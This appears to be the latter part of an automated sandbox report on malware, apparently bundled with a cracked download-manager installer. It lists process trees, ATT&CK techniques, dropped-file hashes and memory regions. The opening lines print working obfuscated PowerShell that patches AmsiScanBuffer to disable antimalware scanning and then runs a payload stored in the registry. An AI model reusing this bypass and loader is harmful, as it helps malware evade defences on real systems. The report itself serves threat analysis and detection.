@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NEfUwjQJmih=$zJeRUwVTCRKEU.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+'l'+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'er'+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+'.'+''+[Char](100)+'l'+'l'+'')));$rTBcJGyxAGFvxd=$RzHnkOitruGaAG.Invoke($Null,@([Object]$NEfUwjQJmih,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+'br'+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$PsCqQLouOYTKeeytr=$RzHnkOitruGaAG.Invoke($Null,@([Object]$NEfUwjQJmih,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+''+'o'+'t'+[Char](101)+'c'+[Char](116)+'')));$sVcqRfU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rTBcJGyxAGFvxd,$HIFwGfiHjfdQgJOmUAR).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+''+[Char](46)+'dl'+[Char](108)+'');$AjSqmQFLJNiOFnkQg=$RzHnkOitruGaAG.Invoke($Null,@([Object]$sVcqRfU,[Object]('A'+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+'r'+'')));$sakOnqelhe=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PsCqQLouOYTKeeytr,$shFOAMSQXeypbiOoZRcfYT).Invoke($AjSqmQFLJNiOFnkQg,[uint32]8,4,[ref]$sakOnqelhe);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AjSqmQFLJNiOFnkQg,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PsCqQLouOYTKeeytr,$shFOAMSQXeypbiOoZRcfYT).Invoke($AjSqmQFLJNiOFnkQg,[uint32]8,0x20,[ref]$sakOnqelhe);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+'T'+[Char](87)+'ARE').GetValue('d'+'i'+'a'+[Char](108)+'er'+[Char](115)+''+'t'+'ag'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
1⤵
PID:2464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:RAITtcCboeuJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$GDmyituyojCnpq,[Parameter(Position=1)][Type]$yyDhdImBWo)$FpyxDrPWWkq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+'f'+''+[Char](108)+''+[Char](101)+''+'c'+'te'+[Char](100)+''+[Char](68)+'el'+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+[Char](68)+''+[Char](101)+'l'+[Char](101)+'ga'+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+'p'+'e','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'P'+''+[Char](117)+''+[Char](98)+'lic,'+'S'+'e'+[Char](97)+'l'+'e'+''+'d'+',A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+'A'+'u'+[Char](116)+''+[Char](111)+''+'C'+'l'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$FpyxDrPWWkq.DefineConstructor('R'+[Char](84)+'S'+[Char](112)+''+'e'+''+'c'+''+[Char](105)+''+'a'+'l'+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$GDmyituyojCnpq).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+''+'i'+''+'m'+''+'e'+''+[Char](44)+'M'+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$FpyxDrPWWkq.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+'k'+'e',''+[Char](80)+'u'+[Char](98)+'li'+'c'+''+','+''+'H'+'i'+[Char](100)+''+'e'+''+'B'+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l',$yyDhdImBWo,$GDmyituyojCnpq).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+'i'+'m'+[Char](101)+''+[Char](44)+'Ma'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+'d');Write-Output $FpyxDrPWWkq.CreateType();}$JgyezHEreEOBn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+'e'+'m'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType('M'+'i'+''+[Char](99)+'r'+[Char](111)+''+'s'+'o'+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'Unsa'+'f'+''+[Char](101)+'J'+'g'+''+[Char](121)+'ez'+'H'+'E'+[Char](114)+''+[Char](101)+'E'+[Char](79)+''+'B'+'n');$XwoSQZynzIAXKt=$JgyezHEreEOBn.GetMethod(''+[Char](88)+''+[Char](119)+''+'o'+''+[Char](83)+''+'Q'+''+'Z'+''+[Char](121)+''+[Char](110)+''+[Char](122)+''+'I'+''+[Char](65)+'X'+'K'+''+[Char](116)+'',[Reflection.BindingFlags]''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+''+[Char](116)+''+'a'+''+'t'+''+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$NVjNKejfUnADeBqUfzd=RAITtcCboeuJ @([String])([IntPtr]);$LmyGXpzfqWkURvoTHEEpzh=RAITtcCboeuJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$QgTsPLGIuIH=$JgyezHEreEOBn.GetMethod('G'+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+'n'+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$LgtQoAhzwVySIH=$XwoSQZynzIAXKt.Invoke($Null,@([Object]$QgTsPLGIuIH,[Object](''+[Char](76)+'oad'+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$eentagDXqWGywmhqp=$XwoSQZynzIAXKt.Invoke($Null,@([Object]$QgTsPLGIuIH,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+'alP'+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+'c'+'t')));$DXTlISa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LgtQoAhzwVySIH,$NVjNKejfUnADeBqUfzd).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+[Char](100)+'l'+[Char](108)+'');$EQUoTAdoURSuAnDQh=$XwoSQZynzIAXKt.Invoke($Null,@([Object]$DXTlISa,[Object]('A'+[Char](109)+''+[Char](115)+''+'i'+''+'S'+'c'+'a'+'n'+'B'+'u'+'f'+''+[Char](102)+''+'e'+''+'r'+'')));$elAuaxJMpX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eentagDXqWGywmhqp,$LmyGXpzfqWkURvoTHEEpzh).Invoke($EQUoTAdoURSuAnDQh,[uint32]8,4,[ref]$elAuaxJMpX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EQUoTAdoURSuAnDQh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eentagDXqWGywmhqp,$LmyGXpzfqWkURvoTHEEpzh).Invoke($EQUoTAdoURSuAnDQh,[uint32]8,0x20,[ref]$elAuaxJMpX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+'W'+[Char](65)+''+'R'+''+'E'+'').GetValue('di'+[Char](97)+''+[Char](108)+''+'e'+'r'+[Char](115)+'t'+'a'+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)
1⤵
PID:620

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:4512

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{9dc6e3f1-ae05-4da4-97ea-adf3db379f15}
1⤵
PID:2704

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scripting

T1064

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
3.7MB

MD5
2633b7825a18e339d1c339a2475906e6

SHA1
a21077a1e5a72b9d8f9d4011d4b0cc659daf9cc8

SHA256
a3576399f5fb369a3ecbbabf804c4e8950eaccea304949eae965f2cf28e0219f

SHA512
14bd8873dbc3dd86bf743fa7927ec5adf9d4e78704181f33f849ef7c5d257588a3d96f2198b19d0fd69f5a7da67c3b610f37ceb8ec6e58da85df07be12025739

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

Filesize
2KB

MD5
00ed77f0198ef7fb2943623375e62be5

SHA1
d3b8ba7ab5189e20776fd8c5c5807a64899e19cd

SHA256
0b98d99267b9343be223f17fbcedc608f803a7193ee7fe3b662902e96a7c65e5

SHA512
eddf083b0173f8109d633c8c5d4b557da24621d160a80a144bac1db375f5ae656444bc608ac5379aa1573d3555cfed7f0834f9c8ede3a059948d672f0ad9c1b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a630c30d3812b3d31c1c3bcecb421cdb

SHA1
fb933bb8983e9d09e1e708867f29d23a22a19f1c

SHA256
18b706bd4f6e2d39cae031c127303d3a5384c2914797f6b39a8dfb9053fa0874

SHA512
c270f89d9270f57ad0c3a876e46e46a1aeb885abe2e845fc2b030f0d257a498636b45bb3f5d4d2921b3affd3ce560d7293b6799e7e852fa944800efb521e89f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a630c30d3812b3d31c1c3bcecb421cdb

SHA1
fb933bb8983e9d09e1e708867f29d23a22a19f1c

SHA256
18b706bd4f6e2d39cae031c127303d3a5384c2914797f6b39a8dfb9053fa0874

SHA512
c270f89d9270f57ad0c3a876e46e46a1aeb885abe2e845fc2b030f0d257a498636b45bb3f5d4d2921b3affd3ce560d7293b6799e7e852fa944800efb521e89f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe

Filesize
960KB

MD5
367dd476c0574f68f53020529c1b2623

SHA1
747d93ffd8afbe48203ac7b19b5c087072be6670

SHA256
efb4ed64cbd3ed0031b494d87402520f4401c47684539bb4a09fb8e02024085f

SHA512
c4e13af20acab668b84d0d22fd757fd56f2202555495dd038af8bce6f4630bcce3b834437214013e7710de28c8642d79b1315c4e33481bc71b4900972428f05d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe

Filesize
960KB

MD5
367dd476c0574f68f53020529c1b2623

SHA1
747d93ffd8afbe48203ac7b19b5c087072be6670

SHA256
efb4ed64cbd3ed0031b494d87402520f4401c47684539bb4a09fb8e02024085f

SHA512
c4e13af20acab668b84d0d22fd757fd56f2202555495dd038af8bce6f4630bcce3b834437214013e7710de28c8642d79b1315c4e33481bc71b4900972428f05d

Download Submit
C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp

Filesize
167KB

MD5
4560be1f497974ca52528a52786c8f34

SHA1
14219c7e444fc2a8145f09cebea6886f02de0034

SHA256
fc805d03f73c28aaee359811e046ff9fd39febbc80fc6bf01843d5fca9104a74

SHA512
922277f1c4e766230c6723d899d6f1d3616096b1923c1751fb856a0083727c9d3d5f1e48db6db88182dd5643d6686c6ca91b212c001a9aa536d997f9355aae0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\directx.exe

Filesize
281KB

MD5
f7ef4f521d8e92b4781ef2b7da37575c

SHA1
88165db00fc7cfc975c44a8002ce16cf9718617a

SHA256
7d7b290e704e304f6d8aed8e2d319ff5d814783a46dd113dc9e7184fc2aa705a

SHA512
5f9394ef4c265365f4166cf277cddefff7274a864577c74e3f518aa1ba386fbf616d7108f1ba656778eaa45cb3c37119600b61bcd2019e7e08277aa1a2add112

Download Submit
C:\Users\Admin\AppData\Local\Temp\directx.exe

Filesize
281KB

MD5
f7ef4f521d8e92b4781ef2b7da37575c

SHA1
88165db00fc7cfc975c44a8002ce16cf9718617a

SHA256
7d7b290e704e304f6d8aed8e2d319ff5d814783a46dd113dc9e7184fc2aa705a

SHA512
5f9394ef4c265365f4166cf277cddefff7274a864577c74e3f518aa1ba386fbf616d7108f1ba656778eaa45cb3c37119600b61bcd2019e7e08277aa1a2add112

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxCrack.exe

Filesize
95KB

MD5
af8a3a1cb685f9e1fdcc970bd4ca420f

SHA1
9342d6f660df293516c2932c905fe4411474e321

SHA256
39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

SHA512
04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxCrack.exe

Filesize
95KB

MD5
af8a3a1cb685f9e1fdcc970bd4ca420f

SHA1
9342d6f660df293516c2932c905fe4411474e321

SHA256
39d7aead40f62566713de4ad6f430c06973fda6da972748f982a3d75f23715a9

SHA512
04864f3c6d4447694d4d4e4d5722302b13a41827d33fd3390fdc2e2c5f3dc8169bab0781099c79f0cb7b6af6d0b4870a3b226ab92ef37b62cca0aa86e00f4186

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxERR.exe

Filesize
284KB

MD5
9092eb5552405cb7c2315696459b6d25

SHA1
86197728db510112ea0aac0f55e1010900155cad

SHA256
ae9dcb23a2e9d2275b93f81ffd9e33fa08cb1f4aa6b085d0b40a0a55aade1fd6

SHA512
886a316447e70b5f87450a73ad2795cbedae1fd82a2f4985dc14e2102cf9bda4507e16276e32bc32d4cb893a098555f8058bd6e59e13283ee6386737508c0aa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxERR.exe

Filesize
284KB

MD5
9092eb5552405cb7c2315696459b6d25

SHA1
86197728db510112ea0aac0f55e1010900155cad

SHA256
ae9dcb23a2e9d2275b93f81ffd9e33fa08cb1f4aa6b085d0b40a0a55aade1fd6

SHA512
886a316447e70b5f87450a73ad2795cbedae1fd82a2f4985dc14e2102cf9bda4507e16276e32bc32d4cb893a098555f8058bd6e59e13283ee6386737508c0aa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxMer.exe

Filesize
111KB

MD5
dab5342d0d566bc7d80e1cc11459912e

SHA1
7cd1a45da9458278571b13f08b28f607093e1225

SHA256
fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

SHA512
0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxMer.exe

Filesize
111KB

MD5
dab5342d0d566bc7d80e1cc11459912e

SHA1
7cd1a45da9458278571b13f08b28f607093e1225

SHA256
fa6ed407a949b1da6c2123ef67ef53280c4bb02bde373c62cad3ae228b5a4dd1

SHA512
0ccb2bc126d3a9e4af8cc022d93db95a9b542beb488bc23f55ade60cf7a5437657a9a0095cb4b8f56408fb75eddcb8d80a1c7ba2e658a889c57762d8d3f77d72

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxUp.exe

Filesize
281KB

MD5
1c9be0fe2f65152329184053c816b21c

SHA1
ff7859fee1f07083d5eeb3776d681d8d43ebf163

SHA256
89e6d5cdd37b63fc6dffb4e9fbf4d2b9ae12ed4134ddc6cdad09bf96b47ab772

SHA512
19b6f6157b1c0114b60d7ebd8e5557a4f4a40eb8e4cd6e04c1f6d6a33d5f9413bed27635a8fdd8b8dd23a24d91ffaf5771ce8063a93fcd76b5a9fc04c88b9b77

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxUp.exe

Filesize
281KB

MD5
1c9be0fe2f65152329184053c816b21c

SHA1
ff7859fee1f07083d5eeb3776d681d8d43ebf163

SHA256
89e6d5cdd37b63fc6dffb4e9fbf4d2b9ae12ed4134ddc6cdad09bf96b47ab772

SHA512
19b6f6157b1c0114b60d7ebd8e5557a4f4a40eb8e4cd6e04c1f6d6a33d5f9413bed27635a8fdd8b8dd23a24d91ffaf5771ce8063a93fcd76b5a9fc04c88b9b77

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxc.exe

Filesize
3.7MB

MD5
2633b7825a18e339d1c339a2475906e6

SHA1
a21077a1e5a72b9d8f9d4011d4b0cc659daf9cc8

SHA256
a3576399f5fb369a3ecbbabf804c4e8950eaccea304949eae965f2cf28e0219f

SHA512
14bd8873dbc3dd86bf743fa7927ec5adf9d4e78704181f33f849ef7c5d257588a3d96f2198b19d0fd69f5a7da67c3b610f37ceb8ec6e58da85df07be12025739

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxc.exe

Filesize
3.7MB

MD5
2633b7825a18e339d1c339a2475906e6

SHA1
a21077a1e5a72b9d8f9d4011d4b0cc659daf9cc8

SHA256
a3576399f5fb369a3ecbbabf804c4e8950eaccea304949eae965f2cf28e0219f

SHA512
14bd8873dbc3dd86bf743fa7927ec5adf9d4e78704181f33f849ef7c5d257588a3d96f2198b19d0fd69f5a7da67c3b610f37ceb8ec6e58da85df07be12025739

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxw.exe

Filesize
8.4MB

MD5
fcc4014be0904e1cfa6939912db2a1b0

SHA1
224947f2dc32e111bcd74a7eb4655f512c52f906

SHA256
a6f580ad9b771d64c018acc1c804e68089d33eb394ff06adb1df59e8f33ed7b1

SHA512
a3fda3c8257f466e47d3be243dae3529207f77e4e28a4ee3d33c74072646305a8202f6130b96a1f235506cf27b33e0922c8d385a040bcbe1b389de46fd9ac685

Download Submit
C:\Users\Admin\AppData\Local\Temp\directxw.exe

Filesize
8.4MB

MD5
fcc4014be0904e1cfa6939912db2a1b0

SHA1
224947f2dc32e111bcd74a7eb4655f512c52f906

SHA256
a6f580ad9b771d64c018acc1c804e68089d33eb394ff06adb1df59e8f33ed7b1

SHA512
a3fda3c8257f466e47d3be243dae3529207f77e4e28a4ee3d33c74072646305a8202f6130b96a1f235506cf27b33e0922c8d385a040bcbe1b389de46fd9ac685

Download Submit
C:\Users\Admin\AppData\Local\Temp\idman641build6.exe

Filesize
10.8MB

MD5
86c93b0ee3e77b8dd9607bf4e7b128c3

SHA1
3d11f01673e60c7f371de56e038260e3dd6e6663

SHA256
f1426aaf6d87b012ca2e403ae7f9e0e73543a9dfec324591b10246cc588cbffc

SHA512
0caa2d240737bfe7a41d88e22d1b990a93ed63804c57eeb30d238b602d8b3815c54cf76c17f3f0fb19b857bc29d89736c632bd8d9a530c2edb492d3687c6c25d

Download Submit
C:\Users\Admin\AppData\Local\Temp\idman641build6.exe

Filesize
10.8MB

MD5
86c93b0ee3e77b8dd9607bf4e7b128c3

SHA1
3d11f01673e60c7f371de56e038260e3dd6e6663

SHA256
f1426aaf6d87b012ca2e403ae7f9e0e73543a9dfec324591b10246cc588cbffc

SHA512
0caa2d240737bfe7a41d88e22d1b990a93ed63804c57eeb30d238b602d8b3815c54cf76c17f3f0fb19b857bc29d89736c632bd8d9a530c2edb492d3687c6c25d

Download Submit
C:\Users\Admin\AppData\Local\Temp\vsdir.exe

Filesize
353KB

MD5
b4940cb1ecb9104962f9899436f192a7

SHA1
72615bdba256c9f429627f17af555fb27e64c75d

SHA256
7b80b726acfe2b1f51d6a8d1db3e99090fbf49bec9e4d7f323e6c0415ef76b1a

SHA512
00791d66f86f2a314036b470b4339aca319bb3693ac23ae13bbb0625931750b828670ed90a70c47e317453e458bad714af0c756eaa3491c6f327c6d7f4f5b305

Download Submit
C:\Users\Admin\AppData\Local\Temp\vsdir.exe

Filesize
353KB

MD5
b4940cb1ecb9104962f9899436f192a7

SHA1
72615bdba256c9f429627f17af555fb27e64c75d

SHA256
7b80b726acfe2b1f51d6a8d1db3e99090fbf49bec9e4d7f323e6c0415ef76b1a

SHA512
00791d66f86f2a314036b470b4339aca319bb3693ac23ae13bbb0625931750b828670ed90a70c47e317453e458bad714af0c756eaa3491c6f327c6d7f4f5b305

Download Submit
memory/320-150-0x0000000000090000-0x00000000000AE000-memory.dmp

Filesize
120KB

Download
memory/320-152-0x00000000049C0000-0x0000000004A5C000-memory.dmp

Filesize
624KB

Download
memory/320-144-0x0000000000000000-mapping.dmp

Download
memory/576-278-0x00007FFEACFD0000-0x00007FFEACFE0000-memory.dmp

Filesize
64KB

Download
memory/620-275-0x00007FFEEC210000-0x00007FFEEC2CE000-memory.dmp

Filesize
760KB

Download
memory/620-274-0x00007FFEECF50000-0x00007FFEED145000-memory.dmp

Filesize
2.0MB

Download
memory/620-212-0x0000000000000000-mapping.dmp

Download
memory/620-258-0x00007FFECD6B0000-0x00007FFECE171000-memory.dmp

Filesize
10.8MB

Download
memory/620-266-0x00007FFEECF50000-0x00007FFEED145000-memory.dmp

Filesize
2.0MB

Download
memory/620-273-0x00007FFECD6B0000-0x00007FFECE171000-memory.dmp

Filesize
10.8MB

Download
memory/620-267-0x00007FFEEC210000-0x00007FFEEC2CE000-memory.dmp

Filesize
760KB

Download
memory/660-279-0x00007FFEACFD0000-0x00007FFEACFE0000-memory.dmp

Filesize
64KB

Download
memory/672-187-0x0000000000000000-mapping.dmp

Download
memory/672-191-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/868-245-0x0000000000000000-mapping.dmp

Download
memory/1304-244-0x0000000000000000-mapping.dmp

Download
memory/1328-234-0x0000000000000000-mapping.dmp

Download
memory/1380-238-0x0000000000400000-0x000000000132A000-memory.dmp

Filesize
15.2MB

Download
memory/1380-161-0x0000000000000000-mapping.dmp

Download
memory/1380-207-0x0000000000400000-0x000000000132A000-memory.dmp

Filesize
15.2MB

Download
memory/1512-253-0x00007FF6DD8D1938-mapping.dmp

Download
memory/1536-261-0x0000000000000000-mapping.dmp

Download
memory/1628-232-0x0000000000000000-mapping.dmp

Download
memory/1668-248-0x0000000000000000-mapping.dmp

Download
memory/1748-264-0x0000000000000000-mapping.dmp

Download
memory/1824-181-0x0000000000000000-mapping.dmp

Download
memory/1824-205-0x0000000005270000-0x00000000052AC000-memory.dmp

Filesize
240KB

Download
memory/1824-182-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/1824-202-0x0000000004FD0000-0x0000000004FE2000-memory.dmp

Filesize
72KB

Download
memory/1884-190-0x0000000005810000-0x0000000005E28000-memory.dmp

Filesize
6.1MB

Download
memory/1884-167-0x0000000000000000-mapping.dmp

Download
memory/1884-222-0x0000000006580000-0x0000000006742000-memory.dmp

Filesize
1.8MB

Download
memory/1884-196-0x0000000005340000-0x000000000544A000-memory.dmp

Filesize
1.0MB

Download
memory/1884-223-0x0000000007300000-0x000000000782C000-memory.dmp

Filesize
5.2MB

Download
memory/1884-169-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/2124-210-0x0000000000000000-mapping.dmp

Download
memory/2276-265-0x0000000000000000-mapping.dmp

Download
memory/2304-139-0x0000000000000000-mapping.dmp

Download
memory/2328-243-0x0000000000000000-mapping.dmp

Download
memory/2392-219-0x0000000006970000-0x0000000006A02000-memory.dmp

Filesize
584KB

Download
memory/2392-218-0x0000000008E10000-0x00000000093B4000-memory.dmp

Filesize
5.6MB

Download
memory/2392-241-0x0000000008BD0000-0x0000000008C46000-memory.dmp

Filesize
472KB

Download
memory/2392-242-0x0000000008C50000-0x0000000008CA0000-memory.dmp

Filesize
320KB

Download
memory/2392-194-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/2392-189-0x0000000000000000-mapping.dmp

Download
memory/2620-148-0x0000000000000000-mapping.dmp

Download
memory/2704-277-0x00007FFEECF50000-0x00007FFEED145000-memory.dmp

Filesize
2.0MB

Download
memory/2704-268-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2704-269-0x0000000140002314-mapping.dmp

Download
memory/2704-271-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/2704-276-0x00007FFEEC210000-0x00007FFEEC2CE000-memory.dmp

Filesize
760KB

Download
memory/2704-272-0x00007FFEECF50000-0x00007FFEED145000-memory.dmp

Filesize
2.0MB

Download
memory/2792-141-0x0000000000000000-mapping.dmp

Download
memory/3044-154-0x0000000000980000-0x0000000000D04000-memory.dmp

Filesize
3.5MB

Download
memory/3044-220-0x0000000000980000-0x0000000000D04000-memory.dmp

Filesize
3.5MB

Download
memory/3044-136-0x0000000000000000-mapping.dmp

Download
memory/3192-215-0x0000000006870000-0x000000000688E000-memory.dmp

Filesize
120KB

Download
memory/3192-227-0x0000000007920000-0x000000000793A000-memory.dmp

Filesize
104KB

Download
memory/3192-135-0x0000000000000000-mapping.dmp

Download
memory/3192-145-0x00000000029B0000-0x00000000029E6000-memory.dmp

Filesize
216KB

Download
memory/3192-153-0x00000000055B0000-0x0000000005BD8000-memory.dmp

Filesize
6.2MB

Download
memory/3192-213-0x0000000006890000-0x00000000068C2000-memory.dmp

Filesize
200KB

Download
memory/3192-216-0x0000000007C10000-0x000000000828A000-memory.dmp

Filesize
6.5MB

Download
memory/3192-217-0x00000000075D0000-0x00000000075EA000-memory.dmp

Filesize
104KB

Download
memory/3192-228-0x0000000007900000-0x0000000007908000-memory.dmp

Filesize
32KB

Download
memory/3192-211-0x00000000062E0000-0x00000000062FE000-memory.dmp

Filesize
120KB

Download
memory/3192-226-0x0000000007820000-0x000000000782E000-memory.dmp

Filesize
56KB

Download
memory/3192-214-0x0000000074180000-0x00000000741CC000-memory.dmp

Filesize
304KB

Download
memory/3192-174-0x0000000005300000-0x0000000005322000-memory.dmp

Filesize
136KB

Download
memory/3192-186-0x0000000005BE0000-0x0000000005C46000-memory.dmp

Filesize
408KB

Download
memory/3192-224-0x0000000007860000-0x00000000078F6000-memory.dmp

Filesize
600KB

Download
memory/3192-221-0x0000000007640000-0x000000000764A000-memory.dmp

Filesize
40KB

Download
memory/3192-192-0x0000000005CC0000-0x0000000005D26000-memory.dmp

Filesize
408KB

Download
